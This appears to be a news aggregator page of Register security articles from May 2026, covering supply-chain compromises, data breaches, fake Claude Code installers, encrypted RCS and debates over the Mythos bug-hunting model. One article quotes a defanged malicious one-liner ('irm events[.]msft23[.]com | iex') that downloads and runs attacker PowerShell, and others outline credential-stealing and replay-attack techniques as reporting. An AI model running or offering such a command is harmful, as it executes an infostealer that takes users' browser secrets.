A US commercial bank just tattled on itself to the Securities and Exchange Commission (SEC) for plugging a bunch of customer data into an unauthorized AI application. Community Bank, which operates in southwestern Pennsylvania, Ohio, and West Virginia, filed an 8-K with the regulator on Monday, saying it launched an investigation into the internal cockup, which remains ongoing. It felt compelled to submit the filing "due to the volume and sensitive nature of the non-public information." This included customer names, dates of birth, and Social Security numbers, but the filing provided no further detail about the incident. Community Bank did not specify what this "unauthorized AI-based software application" was or how it was used. However, the disclosure of data such as SSNs, which in the US are generally categorized among the most sensitive types of data that organizations can store on behalf of customers, is protected under several federal and state laws. One possibility is that the data was entered into a generative AI tool outside the bank's approved systems. If so, that could raise questions about whether the information was transmitted to a third-party provider and how it may have been retained or processed. The Register asked Community Bank for more details and will update this story if it responds. The bank confirmed that it suffered no operational impact and customers were not prevented from accessing their accounts or payment services as a result. "The company is evaluating the customer data that was affected and is conducting notifications as required by applicable federal and state laws and regulatory guidance," Community Bank stated in its cybersecurity disclosure. "The company has been, and continues to be, in communication with relevant banking and financial regulators regarding the incident." It also promised to continue its remediation efforts, take action to prevent future failures, and gave the "we're committed to protecting customers' data" line that always goes down so well. ®
Categories: News

Cache-poisoning caper turns TanStack npm packages toxic

The Register - Tue, 12/05/2026 - 13:00
An attacker has published 84 malicious versions of official TanStack npm packages, with the impact including credential theft, self-propagation, and complete disk wipe of an infected host. The attack is part of a wave of attacks across npm and PyPI, continuing the Mini Shai-Hulud campaign. Supply chain security company Socket reports that other compromised packages include the OpenSearch client, Mistral AI, UiPath, and Guardrails AI. Malicious npm packages for TanStack, an open source application stack, were published between 19:20 and 19:26 UTC on May 11. The attack was detected and reported within 30 minutes by StepSecurity, triggering incident response and npm deprecation. GitHub published a security advisory at 21:30 UTC, including a list of affected packages. TanStack founder Tanner Linsley published a postmortem describing how the attacker used a malicious commit on a fork to create a pull request on the TanStack repository, causing scripts to auto-run and build the malware. This poisoned the GitHub Actions cache in what Linsley said is a variant of a known GitHub Action vulnerability discovered in 2024. The malware then extracted the npm OpenID Connect (OIDC) token, used for trusted npm publishing, from runner memory using the same code used to compromise tj-actions in an attack last year. No TanStack maintainers were compromised. StepSecurity has a detailed analysis of the attack, noting that the payload "reads files from over 100 hardcoded paths" including those that may contain cloud credentials, SSH (secure shell) keys, developer tool configuration files, crypto wallets, VPN configurations, messaging credentials, and shell history. Shell history may contain tokens and passwords pasted into the terminal. Security researcher Nicholas Carlini warned the payload "installs a dead-man's switch… as a system user service." The service checks whether a stolen GitHub token has been revoked and, if it has, runs a command to wipe the local disk completely. Socket's write-up includes recommended actions such as rotating all secrets on any affected system. GitHub's advisory suggests "any developer or CI environment that ran npm install, pnpm install, or yarn install against an affected version on 2026-05-11 should be considered compromised." The Mistral AI has also been reported on GitHub, and at the time of writing, the Mistral AI project is quarantined on PyPI. This attack is still evolving and will likely have a far-reaching impact. It confirms again that running everyday commands like npm install is unsafe, that for all their efforts major package repositories including npm and PyPI are still not secured, and that software development is now best done in isolated, ephemeral environments. ®
Categories: News

Apple, Google drag cross-platform texting into the encrypted age

The Register - Tue, 12/05/2026 - 10:46
Apple and Google have taken a big step toward securing cross-platform texting, ending years of messages bouncing around in glorified plaintext. Apple announced this week that encrypted Rich Communication Services (RCS) messaging is rolling out in beta for iPhone users running iOS 26.5 and Android users on the latest version of Google Messages. The feature works across supported carriers and adds end-to-end encryption to cross-platform chats that were still taking the scenic route through carrier-era messaging infrastructure. Users will know it's enabled when a lock icon appears in RCS conversations. Apple says E2EE RCS messages cannot be read while traveling between devices, bringing Android-to-iPhone chats closer to the protections offered by WhatsApp and Signal. The move lands as other platforms head in the opposite direction. Earlier this month, Meta confirmed it was backing away from parts of its encryption rollout for Instagram DMs, telling The Register that "very few" people actually used the feature and suggesting privacy-minded users head over to WhatsApp instead. Apple, meanwhile, appears content to lean harder into the privacy angle, finally plugging one of the more obvious holes in modern messaging security. That gap has been hanging around for years. While iMessage chats between Apple devices were already encrypted, conversations involving Android phones could fall back to SMS or unencrypted RCS, depending on carrier support. Google had offered encrypted RCS chats inside Google Messages for years, but only when both sides used Google's ecosystem. Apple joining the party means cross-platform RCS encryption is finally starting to span the two largest mobile ecosystems. The rollout is still marked as beta, and carrier support varies by region, so not everyone will get encrypted chats immediately. UK availability remains unclear for now, as none of the major UK networks currently appear on Apple's published compatibility lists for the feature. Still, after two decades of the mobile industry insisting that interoperability and security could not coexist, cross-platform texting may finally be catching up with the rest of modern messaging. ®
Categories: News

Japan’s PM orders cybersecurity review to stop Mythos going full CyberZilla

The Register - Tue, 12/05/2026 - 06:40
Japan’s prime minister Sanae Takaichi has ordered a review of government cybersecurity strategy, citing the arrival of Anthropic’s bug-hunting model Mythos as a moment that makes it necessary to order a cabinet-level project. In a Tuesday cabinet meeting, the PM instructed cybersecurity minister Hisashi Matsumoto to devise measures to check the state of government systems to determine whether it’s possible to detect and fix vulnerabilities, and to develop a plan to ensure critical infrastructure operators can do likewise. Japan’s leader ordered the checks because she feels Mythos and similar frontier models may be misused, and that attacks on infrastructure may therefore increase in speed and scale – perhaps even exponentially. Over the last couple of years cybersecurity vendors and researchers have often pointed out that AI models make it possible to find flaws and automate attacks. When Anthropic debuted Mythos in early April, the notion that AI has the potential to vastly complicate the security landscape went mainstream. Many regulators around the world have issued guidance to point out that now is the perfect time to revisit and improve security strategies and capabilities, because Mythos and other AI models mean defenses are going to be tested like never before. India’s securities regulator went a step further by ordering a security review at the organizations it oversees. And now Japan’s leader has decided the matter is of sufficient importance that her office needs to weigh in and set new policy to ensure AI doesn’t go on a destructive rampage through Japanese infrastructure. Whether Takaichi’s urgency is needed is open to debate. Some researchers have said that while Mythos can find bugs at speed, but doesn’t find flaws humans can’t detect with their naked brains. Others suggest Mythos is not vastly better at finding bugs than open source models that pre-date it and are publicly available – unlike Mythos which is restricted to certain users. Others have all but dismissed Mythos as a marketing stunt. ® .
Categories: News

Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline

The Register - Tue, 12/05/2026 - 00:16
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and Advanced Placement testing for many. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: News

Cookie thieves caught stealing dev secrets via fake Claude Code installers

The Register - Mon, 11/05/2026 - 21:21
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: News

Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator

The Register - Mon, 11/05/2026 - 17:30
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: News

BWH Hotels guests warned after reservation data checks out with cybercrooks

The Register - Mon, 11/05/2026 - 15:34
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
Categories: News

Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged

The Register - Mon, 11/05/2026 - 13:11
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. It updated customers on Saturday, May 9, after discovering a version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, was made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. Installed by several hundred controllers, the plugin remains available at the time of writing, and appears as the most recently available version, although pull requests actioned on Monday morning suggest this will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the early supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware. These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugins page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now,” and altering the description to claim CheckMarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As previously seen in The Register, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®
Categories: News

Taiwan's train cyber-trauma reveals a global system that’s coming off the tracks

The Register - Mon, 11/05/2026 - 09:30
OPINION There are three little words to make the heart beat faster in anyone who knows what they mean: critical infrastructure resilience. If you run that infrastructure or a country dependent on it, you need energy, communication and transport to be impregnable to cyber attacks. This is doubly so if that country is five minutes by incoming missile from an implacable hyper-competent enemy sworn to invade you. One that is building and equipping its military as fast as it can with this one thing in mind. One with the most invasive and brazen state hacking machinery on the planet. Thus it was a very bad day indeed when Taiwan’s entire bullet train system was disabled for nearly an hour by an unknown attacker. It got even worse when that attacker turned out not to be the implacable and hyper-resourced state actor over the Taiwan Strait, but a university student with a yen for radio and some kit he bought online. On the one hand, it’s good to see the good repair of the grand tradition of young hackers causing havoc from their bedrooms. On the other, WTRF? The information released by the Taiwanese authorities is scant on details, but enough to be pretty sure what actually happened. It’s bad news not just for Taiwan but for more than 100 countries that also use the TETRA two-way radio standard involved, often for emergency services. In many cases, it was the default replacement for unencrypted FM two-way radios, adding encryption, flexibility and network security. These were state of the art when TETRA was developed in the 1980s and 1990s — and work as well in 2026 as you might expect. Oops. There have been upgrades and, especially after the 2023 vulnerability disclosures, an accelerated program of making things better. A lot of the installed base globally is old, lacks over-the-air updates for security, and in any case spending money on new radios is normally at the bottom of the list for any state or public service organizations. Things have to get really bad first. Perhaps they just have. (North America is the only region where TETRA is uncommon, as it isn’t approved for public service use. This was either acute foresight or the fact that the TE in TETRA, now officially TErrestrial, used to stand for Trans-Europe. The American system, P.25, has never, however, been renamed Freedom Frequencies. Now on with the show) The network vulnerabilities are one side of the story. Our doughty hacker is the other. Reportedly, he didn’t have any TETRA hardware, but a laptop connected to a radio and an ‘SDR filter’. The latter makes little sense, it is far more likely that he had a software defined radio (SDR) called a HackRF. There are plenty of other devices that could have been used, but the HackRF is the weapon of choice for the gung-ho radio nut. SDR is a technique that has completely changed the rules of how to radio. All radios before it had to be entirely or mostly analog, with precision hardware dedicated to whatever job each radio had to do. This hardware could also be looked at as an analog computer, as it can be modelled as a set of mathematical transformations on the received signal. Analog computers have their place, just not in the 21st century. SDR is radio as digital computer. At heart, it has three components: an analog to digital converter to turn the incoming signal to a stream of numbers, very fast processing to do the radio math, and a digital to analogue converter to play the results. What you get is triply terrific. Digital processing is perfect, analog processing adds noise and distortion. Nothing is fixed, everything can be re-engineered with new code. And it can be hog-whimperingly cheap. HackRF is all those things and more. It can be configured as a portable touch-screen device. It transmits and receives from DC to daylight. You can pick one up for less than the price of a mid-range mobile. It is open source. It works with all manner of SDR creation tools, utilities and radio packages. There are infinite legitimate uses. Most excitingly, you can download apps for it that do everything, most especially the kind of thing that will introduce you with surprisingly rapidity to a wide range of new friends with no sense of humor and love letters that look suspiciously like arrest warrants. Think of it as speed dating but with more guns and less no thank yous, GPS spoofing, aviation and marine location transponders, satellite comms, data eavesdropping and injection - take your pick. You’ll need it to unlock the cell door. It is the data detection and injection that seems to have been the downfall of all concerned. A handset had its transmission decoded, and the result was retransmitted into the system as if it were that original radio. Whether the decoded data already had the General Alarm set, or whether the data had to be modified before retransmission, is not yet known. Doesn’t matter. It’s called a replay attack, and it has and is mostly used in stand-alone devices called code grabbers to unlock and steal expensive cars with wireless keys. Some countries, including Canada and the UK, have banned code grabbers, but this has failed on two counts. Code grabbers are small gadgets that can be bought online from China, and good luck policing that. Also, thieves are notably indifferent to laws. That notwithstanding, the UK is thinking of extending the ban to other classes of naughty wireless, and would doubtless like to do the same with HackRF, at least as of last week. Of course, they can’t be banned. SDRs can’t be banned as a class, especially open source ones made out of standard chips and open code. They are general purpose computers, albeit with specialisms. It doesn’t matter if you’re dismayed or delighted that things like HackRF exist, that genie is out of the bottle. What is truly dismaying is that replay attacks are a solved problem, trivially so. Choose a big keyspace, randomize and never repeat keys. That one is on lazy car makers and, apparently, the world of TETRA. Fixing that class of lazy, outdated security vulnerability will be very expensive. Embedded systems are like that, especially old ones. Not fixing this will be a gamble with infinite downside, in a world where electronic warfare systems that used to cost hundreds of millions now pour out of Ali Express for a few bucks. HackRF is to Tetra like Crocodile Dundee’s knife is to the mugger’s. Critical infrastructure resilience. Just three little words, but if you say them you better mean it. And it won’t be cheap. ®
Categories: News

Pages

Subscribe to Sec Tec Limited aggregator - News